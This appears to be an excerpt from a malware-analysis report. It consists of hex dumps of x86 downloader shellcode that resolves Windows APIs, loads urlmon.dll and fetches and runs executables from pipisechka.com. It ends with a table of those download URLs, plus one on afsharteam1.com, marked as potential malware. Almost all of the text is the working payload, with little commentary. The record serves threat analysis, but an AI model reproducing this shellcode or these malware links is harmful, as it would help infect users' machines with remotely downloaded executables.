76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 61 63 6e 74 79 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 | .....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /pipisechka.com/ sleep/acnty2.exe .http://pipisech ka.com/sleep/cli ck.php?r=. |
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 
76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 67 68 69 6d 71 73 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 00 | .....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /pipisechka.com/ sleep/ghimqs2.ex e.http://pipisec hka.com/sleep/cl ick.php?r=.. |
0a 0a 0a 0a 0a 0a 0a 0a e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 
8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 61 63 6d 71 75 78 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 00 | .............Vd. 0....@..p...@.^. U...E.R3....2.@. 8.u...Z]...U..QQ SVW`.].3..u....v <.Nx...Q.R.Q$R.q .N.u..q ...J.B`; U.u.3..73..E.... .u.+.OQ.....;.at ....E..^......3. ..._............ E.a.E._^[..U..Q. I...Ph.`...l...3 .RR.u....E..E... U......E.P.E.u.E .r.E.l.E.m.E.o.E .n.E...E.d.E.l.E .l.E.......Ph].. ...........t.j.j ..u..u.j.....u.@ ..3...W3..L$..|$ ...._..L$..9...t .@.8.u.+..U....d S.E.W3.P.E.k.E.e .E.r.E.n.E.e.E.l .E.3.E.2.E...E.d .E.l.E.l.]...... PhhC..........E. jDP.~....E.j.P.s .......E.P.E.PSS SSSS.u..E.D...S. ._...[..U..QQSVW jB.r.....3...Y.E .a.ex.E.e...~V.E .PV.Q...YP...... .YYt9.F.P.;..... .E.P.!.....YYt.W .....Y.D8.sP.E.. .X.E.PW.t...YYFF ;.|._^[..U..QSf` .2.....X8.t.@..@ .]...Bu.3....... 8.v.@3...t.@8.u. @....3..E..E.[.. 2.http://pipisec hka.com/sleep/ac mqux2.exe.http:/ /pipisechka.com/ sleep/click.php? r=.. |
0a 0a 0a 0a 0a 0a 0a 0a e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 
8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 6c 65 6b 7a 76 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 | .............Vd. 0....@..p...@.^. U...E.R3....2.@. 8.u...Z]...U..QQ SVW`.].3..u....v <.Nx...Q.R.Q$R.q .N.u..q ...J.B`; U.u.3..73..E.... .u.+.OQ.....;.at ....E..^......3. ..._............ E.a.E._^[..U..Q. I...Ph.`...l...3 .RR.u....E..E... U......E.P.E.u.E .r.E.l.E.m.E.o.E .n.E...E.d.E.l.E .l.E.......Ph].. ...........t.j.j ..u..u.j.....u.@ ..3...W3..L$..|$ ...._..L$..9...t .@.8.u.+..U....d S.E.W3.P.E.k.E.e .E.r.E.n.E.e.E.l .E.3.E.2.E...E.d .E.l.E.l.]...... PhhC..........E. jDP.~....E.j.P.s .......E.P.E.PSS SSSS.u..E.D...S. ._...[..U..QQSVW jB.r.....3...Y.E .a.ex.E.e...~V.E .PV.Q...YP...... .YYt9.F.P.;..... .E.P.!.....YYt.W .....Y.D8.sP.E.. .X.E.PW.t...YYFF ;.|._^[..U..QSf` .2.....X8.t.@..@ .]...Bu.3....... 8.v.@3...t.@8.u. @....3..E..E.[.. 2.http://pipisec hka.com/sleep/le kzv2.exe.http:// pipisechka.com/s leep/click.php?r =. |
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|---|---|---|
| http://afsharteam1.com/win/setup.exe | N/A | N/A | |
| http://pipisechka.com/sleep/acmqux2.exe | N/A | N/A | |
| http://pipisechka.com/sleep/acnty2.exe | N/A | N/A | |
| http://pipisechka.com/sleep/cdkpsv7.exe | N/A | N/A | |
| http://pipisechka.com/sleep/click.php?r= | N/A | N/A | |
| http://pipisechka.com/sleep/fptv2.exe | N/A | N/A | |
| http://pipisechka.com/sleep/ghimqs2.exe | N/A | N/A | |
| http://pipisechka.com/sleep/gnbiz2.exe | N/A | N/A | |
| http://pipisechka.com/sleep/lekzv2.exe | N/A | N/A | |
| http://pipisechka.com/sleep/sdgsg5.exe | N/A | N/A | |